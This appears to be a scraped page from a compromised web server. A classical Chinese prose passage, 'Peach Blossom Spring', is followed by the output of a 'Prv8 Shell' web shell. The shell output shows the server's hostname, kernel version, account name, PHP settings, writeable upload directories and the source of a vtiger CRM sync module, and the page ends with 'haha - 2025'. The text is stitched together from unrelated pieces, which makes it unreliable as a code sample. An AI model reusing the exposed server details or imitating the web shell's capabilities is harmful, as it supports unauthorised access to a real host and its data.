晋太元中,武陵人捕鱼为业。缘溪行,忘路之远近。忽逢桃花林,夹岸数百步,中无杂树,芳草鲜美,落英缤纷。渔人甚异之,复前行,欲穷其林。   林尽水源,便得一山,山有小口,仿佛若有光。便舍船,从口入。初极狭,才通人。复行数十步,豁然开朗。土地平旷,屋舍俨然,有良田、美池、桑竹之属。阡陌交通,鸡犬相闻。其中往来种作,男女衣着,悉如外人。黄发垂髫,并怡然自乐。   见渔人,乃大惊,问所从来。具答之。便要还家,设酒杀鸡作食。村中闻有此人,咸来问讯。自云先世避秦时乱,率妻子邑人来此绝境,不复出焉,遂与外人间隔。问今是何世,乃不知有汉,无论魏晋。此人一一为具言所闻,皆叹惋。余人各复延至其家,皆出酒食。停数日,辞去。此中人语云:“不足为外人道也。”(间隔 一作:隔绝)   既出,得其船,便扶向路,处处志之。及郡下,诣太守,说如此。太守即遣人随其往,寻向所志,遂迷,不复得路。   南阳刘子骥,高尚士也,闻之,欣然规往。未果,寻病终。后遂无问津者。 .
Prv8 Shell
Server : Apache
System : Linux srv.rainic.com 4.18.0-553.47.1.el8_10.x86_64 #1 SMP Wed Apr 2 05:45:37 EDT 2025 x86_64
User : rainic ( 1014)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/akaindir/public_html/crm/modules/WSAPP/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/akaindir/public_html/crm/modules/WSAPP/OutlookSyncServer.php
<?php

/*+***********************************************************************************
 * The contents of this file are subject to the vtiger CRM Public License Version 1.0
 * ("License"); You may not use this file except in compliance with the License
 * The Original Code is:  vtiger CRM Open Source
 * The Initial Developer of the Original Code is vtiger.
 * Portions created by vtiger are Copyright (C) vtiger.
 * All Rights Reserved.
 *************************************************************************************/

require_once 'modules/WSAPP/Utils.php';
require_once 'include/database/PearDatabase.php';
require_once 'include/Zend/Json.php';
require_once 'include/utils/utils.php';

class OutlookSyncServer extends SyncServer{
    
    private $destHandler;
    private $create = "create";
    private $update = "update";
    private $delete = "delete"; 
    
    function getDestinationHandleDetails(){
        return array('handlerclass' => 'OutlookVtigerCRMHandler',
            'handlerpath' => 'modules/WSAPP/Handlers/OutlookVtigerCRMHandler.php');
	}
    
    /*
     * Function overrided to deal duplication handling 
     */
     function put($key, $element, $user) {
        global $log;
        $db = PearDatabase::getInstance();
        $appid = parent::appid_with_key($key);
        if (empty($appid)) {
            throw new WebServiceException('WSAPP04', "Access restricted to app");
        }

        if (!is_array($element))
            $records = array($element);
        else
            $records = $element;

        //hardcoded since the destination handler will be vtigerCRM
        $serverKey = wsapp_getAppKey("vtigerCRM");
        $serverAppId = parent::appid_with_key($serverKey);
        $handlerDetails = $this->getDestinationHandleDetails();
        $clientApplicationSyncType = wsapp_getAppSyncType($key);
        require_once $handlerDetails['handlerpath'];
        $this->destHandler = new $handlerDetails['handlerclass']($serverKey);
        $this->destHandler->setClientSyncType($clientApplicationSyncType);

        $recordDetails = array();

        $createRecords = array();
        $updateRecords = array();
        $deleteRecords = array();

        $clientModifiedTimeList = array();
        foreach ($records as $record) {
            $recordDetails = array();
            $clientRecordId = $record['id'];

            // Missing client record id?
            if (empty($clientRecordId))
                continue;

            $lookupRecordId = false;
            // Added for Duplication handling
            if (!empty($record['crmid'])) {
                $crmid = vtws_getIdComponents($record['crmid']);
                $lookupResult = $db->pquery("SELECT crmid,modifiedtime FROM vtiger_crmentity WHERE crmid=?", array($crmid[1]));
                if ($db->num_rows($lookupResult))
                    $lookupRecordId = $record['crmid'];
                if (!(empty($lookupRecordId))) {
                    $clientLastModifiedTime = $db->query_result($lookupResult, 0, 'modifiedtime');
                    $record['values']['id'] = $lookupRecordId;
                    $record['values']['duplicate'] = true;
                    $updateRecords[$clientRecordId] = $record['values'];
                    $updateRecords[$clientRecordId]['module'] = $record['module'];
                    $clientModifiedTimeList[$clientRecordId] = $record['values']['modifiedtime'];
                }
            }
            // End
            else {
                $lookupResult = $db->pquery("SELECT serverid,clientmodifiedtime FROM vtiger_wsapp_recordmapping WHERE appid=? AND clientid=?", array($appid, $clientRecordId));
                if ($db->num_rows($lookupResult))
                    $lookupRecordId = $db->query_result($lookupResult, 0, 'serverid');
                if (empty($lookupRecordId) && $record['mode'] != "delete") {
                    $createRecords[$clientRecordId] = $record['values'];
                    $createRecords[$clientRecordId]['module'] = $record['module'];
                    $clientModifiedTimeList[$clientRecordId] = $record['values']['modifiedtime'];
                } else {
                    if (empty($record['values']) && !(empty($lookupRecordId))) {
                        $deleteRecords[$clientRecordId] = $lookupRecordId;
                    } else if (!(empty($lookupRecordId))) {
                        $clientLastModifiedTime = $db->query_result($lookupResult, 0, 'clientmodifiedtime');
                        if ($clientLastModifiedTime >= $record['values']['modifiedtime'])
                            continue;
                        $record['values']['id'] = $lookupRecordId;
                        $updateRecords[$clientRecordId] = $record['values'];
                        $updateRecords[$clientRecordId]['module'] = $record['module'];
                        $clientModifiedTimeList[$clientRecordId] = $record['values']['modifiedtime'];
                    }
                }
            }
        }

        $recordDetails['created'] = $createRecords;
        $recordDetails['updated'] = $updateRecords;
        $recordDetails['deleted'] = $deleteRecords;
        $result = $this->destHandler->put($recordDetails, $user);

        $response = array();
        $response['created'] = array();
        $response['updated'] = array();
        $response['deleted'] = array();

        $log->fatal($result['updated']);

        $nextSyncDeleteRecords = $this->destHandler->getAssignToChangedRecords();
        foreach ($result['created'] as $clientRecordId => $record) {
            parent::idmap_put($appid, $record['id'], $clientRecordId, $clientModifiedTimeList[$clientRecordId], $record['modifiedtime'], $serverAppId, $this->create);
            $responseRecord = $record;
            $responseRecord['_id'] = $record['id'];
            $responseRecord['id'] = $clientRecordId;
            $responseRecord['_modifiedtime'] = $record['modifiedtime'];
            $responseRecord['modifiedtime'] = $clientModifiedTimeList[$clientRecordId];
            $response['created'][] = $responseRecord;
        }
        foreach ($result['updated'] as $clientRecordId => $record) {
            /*
             * If record is duplicate then it'll be in updated records. But, we should create a mapping instead of
             * updating
             */
            if($record['duplicate']){
                parent::idmap_put($appid, $record['id'], $clientRecordId, $clientModifiedTimeList[$clientRecordId], $record['modifiedtime'], $serverAppId, $this->create);
            }else{
                parent::idmap_put($appid, $record['id'], $clientRecordId, $clientModifiedTimeList[$clientRecordId], $record['modifiedtime'], $serverAppId, $this->update);
            }
            $responseRecord = $record;
            $responseRecord['_id'] = $record['id'];
            $responseRecord['id'] = $clientRecordId;
            $responseRecord['_modifiedtime'] = $record['modifiedtime'];
            $responseRecord['modifiedtime'] = $clientModifiedTimeList[$clientRecordId];
            $response['updated'][] = $responseRecord;
        }
        foreach ($result['deleted'] as $clientRecordId => $record) {
            parent::idmap_put($appid, $record, $clientRecordId, "", "", $serverAppId, $this->delete);
            $response['deleted'][] = $clientRecordId;
        }
        $queueRecordIds = array();
        $queueRecordDetails = array();
        foreach ($nextSyncDeleteRecords as $clientRecordId => $record) {
            $queueRecordIds[] = $record['id'];
            $queueRecordDetails[$record['id']] = parent::convertToQueueRecordFormat($record, $this->delete);
        }
        if (count($queueRecordIds > 0)) {
            $syncServerDetails = parent::idmap_get_clientmap($appid, $queueRecordIds);
            foreach ($queueRecordIds as $serverId) {
                $syncServerId = $syncServerDetails[$serverId]['id'];
                $recordValues = $queueRecordDetails[$serverId];
                if (!parent::checkIdExistInQueue($syncServerId)) {
                    parent::idmap_storeRecordsInQueue($syncServerId, $recordValues, $this->delete, $appid);
                }
            }
        }
        return $response;
    }
}
?>

haha - 2025